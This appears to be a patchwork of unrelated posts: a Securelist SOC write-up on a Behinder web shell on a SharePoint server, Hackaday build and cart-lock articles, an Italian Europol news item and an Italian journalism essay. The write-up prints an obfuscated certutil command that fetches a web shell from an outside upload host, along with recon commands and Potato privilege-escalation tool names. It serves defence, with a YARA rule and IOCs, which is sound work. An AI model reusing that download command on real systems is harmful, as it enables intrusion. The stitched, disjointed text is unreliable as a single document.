Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.

This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.

Onset

It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.

From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.

As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.

A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]

Aftermath

To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato

Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.

With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?

Identifying the threat

Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:

Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)

In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:

The “extraData” structure example

Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.

Uncovering modules and variants

By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:

Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample

Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames

Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:

Sample FC793D722738C7FCDFE8DED66C96495B relations on VT

Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.

Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.

The bigger picture

Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:

ASPX web shell side by side with .NET payload

Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.

Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.

For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.

Happy hunting and see you on the next mission!

YARA rule

rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}

Indicators of compromise

Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll

File paths

C:\ProgramData\DRM\
C:\Users\Default\Videos\

securelist.com/soc-files-web-s…

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…

hackaday.com/2025/02/28/a-diff…

If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.

The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.

[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.

We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.

youtube.com/embed/zz59e1wWyVc?…

[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]

hackaday.com/2025/02/28/cheap-…

Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.

This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.

There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.

We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.

youtube.com/embed/AwRup7wAijU?…

hackaday.com/2025/02/28/low-re…

The original locking wheel.
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.

And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.

The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.

A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.
The original modern-style court from a 1946 paten
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.

Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.

Higher Tech

Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.

This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.

youtube.com/embed/PWZOeM5jdjg?…

Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.

youtube.com/embed/e7KzPQrzY-c?…

Where’s the Hack?

Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.

A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.

youtube.com/embed/fBICDODmCPI?…

Who Knew?

You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.

If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.

Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.

hackaday.com/2025/02/28/tech-i…

Mentre la Polizia Postale e delle comunicazioni italiana dà notizia di una vasta operazione nazionale (denominata Hello) contro la pedopornografia on line (commissariatodips.it/notizie/a…), Europol fornisce la comunicazione di una vasta attività internazionale, denominata Cumberland.

Sono 25 gli arresti in 19 paesi (l'Italia non è compresa) per sfruttamento sessuale infantile, in una operazione coordinata da Europol ed iniziata dalle forze dell'ordine danesi. Nel corso dell'azione, sinora, sono stati 273 i sospetti identificati, 33 le perquisizioni svolte e 173 dispositivi elettronici sequestrati.

Il principale sospetto - un cittadino danese arrestato a novembre 2024 - gestiva una piattaforma online per distribuire materiale generato da AI.
Gli utenti potevano accedere al contenuto dopo aver effettuato un pagamento simbolico per ottenere una password.

La crescente facilità di creazione di immagini AI ha complicato l'identificazione di vittime e colpevoli, rendendo difficile per le autorità identificare se ci siano vittime reali coinvolte. Infatti le immagini generate da AI possono sembrare autentiche, rendendo difficile distinguere tra contenuti reali e artificiali. Inoltre la crescente facilità di creazione di tali immagini consente anche a individui con scarse competenze tecniche di produrle. Infine la mancanza di legislazione nazionale specifica rende complicata l'indagine e l'identificazione delle vittime.

Europol lancerà quindi una campagna per prevenire futuri crimini legati all'uso illegale dell'AI: la campagna mira a raggiungere i potenziali acquirenti di contenuti illegali attraverso messaggi online e altre strategie, come visite dirette e lettere di avviso.

L'obiettivo è educare e dissuadere i criminali, oltre a fornire supporto a chi cerca aiuto.

#operazioneHello #operationCumberland #pedopornografia #cooperazioneinternazionaledipolizia #Europol #poliziapostaleedellecomunicazioni

@Attualità

noblogo.org/transit/la-giusta-…

Transit

2025-02-28 13:34:31

La giusta distanza

(164)

Nel suo film del 2007 “La giusta distanza”, Carlo Mazzacurati narra la vicenda di un giovane apprendista giornalista, che non riesce, in merito ad un fatto di cronaca, a mantenere la “giusta distanza” dai fatti, come gli ha suggerito il suo mentore. Ovvero non riesce ad approfondire abbastanza quel che accade per averne una visione imparziale, il più possibile corretta e scevra da opinioni ed idee personali: quello che, nella teoria, ogni giornalista dovrebbe tendere a fare nel suo mestiere.

In Italia può essere portato ad esempio di come questo modo di operare sia, nei fatti, ignorato del tutto o quasi. Da parte di molte testate giornalistiche e di TG d'ogni canale è è un muoversi nelle direzioni più disparate: dapprima per rimanere “sul pezzo” e, passata la fase di picco a livello di notizia, per estendere all'infinito una serie di tematiche, perlopiù allarmiste e con un alto tasso di sensazionalismo, fino a coprire intere giornate di trasmissione.

E' anche un po' il limite, per esempio, dei canali “All News”, dove per ventiquattro ore al giorno si trasmette ogni sorta di dettaglio, di accadimento, di vocio per coprire la giornata intera. Reiterando all'infinito le stesse cose (non può accadere qualcosa di clamoroso ogni ora), si finisce con il “caricare” la notizia fino allo spasimo, spesso inserendo note di colore che rendono la narrazione volutamente altisonante, pervasiva, angosciante. Una estremizzazione indotta per mantenere attento lo spettatore.

Chiaramente è una maniera d'operare affatto corretta e per quanto giornalisti ed opinionisti lo neghino, appare abbastanza chiaro che è un mare in cui a loro piace nuotare. Possiamo comprendere che sia più semplice fare così che mantenere quella distanza di cui sopra: si rischia, magari, la noia o una maniera troppo blanda di porgere le notizie e molte persone amano, inconsciamente o meno, il clamore e la chiacchiera, a discapito di coloro che, invece, vorrebbero leggere o sentire semplicemente ciò che è successo, senza fronzoli.

D'altro canto ognuno può essere un amplificatore dei fatti: basta un account su “Facebook” o su “X” dove riprendere e commentare ogni cosa venga detta, magari distorcendo ulteriormente le cose, caricandole con opinioni personali (cui si ha diritto) e facendo rimbalzare tutto ovunque. Una sorta di cerchio infinito in cui la sconfitta è l'informazione di qualità, quella cui dovrebbero sempre ambire tutti. Sarebbe un freno per un mondo già sovraccarico di input, dove siamo “bombardati” senza sosta, senza tregua di cose che ci sentiamo obbligati a seguire.

Un corto circuito permanente d'attenzione e di sovraccarico mediatico. E come ogni cosa portata all'eccesso, è un danno. Cui, temo, non si possa più porre rimedio, se non con la volontà personale di distaccarsi da questa narrazione sbilanciata, reinserendo nel proprio modo di informarsi una quanto mai necessaria dose di distacco e di ragionamento. Cose difficili da fare, faticose, ma non impossibili.

#Blog #Opinioni #Media #News #Informazione

Mastodon: @alda7069@mastodon.unoTelegram: t.me/transitblogFriendica: @danmatt@poliverso.orgBio Site (tutto in un posto solo, diamine): bio.site/danielemattioli

Gli scritti sono tutelati da “Creative Commons” (qui)

Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com

Transit

Il blog di Alessandra Corubolo & Daniele Mattioli. On line -in varie forme- dal 2005.

^Telegram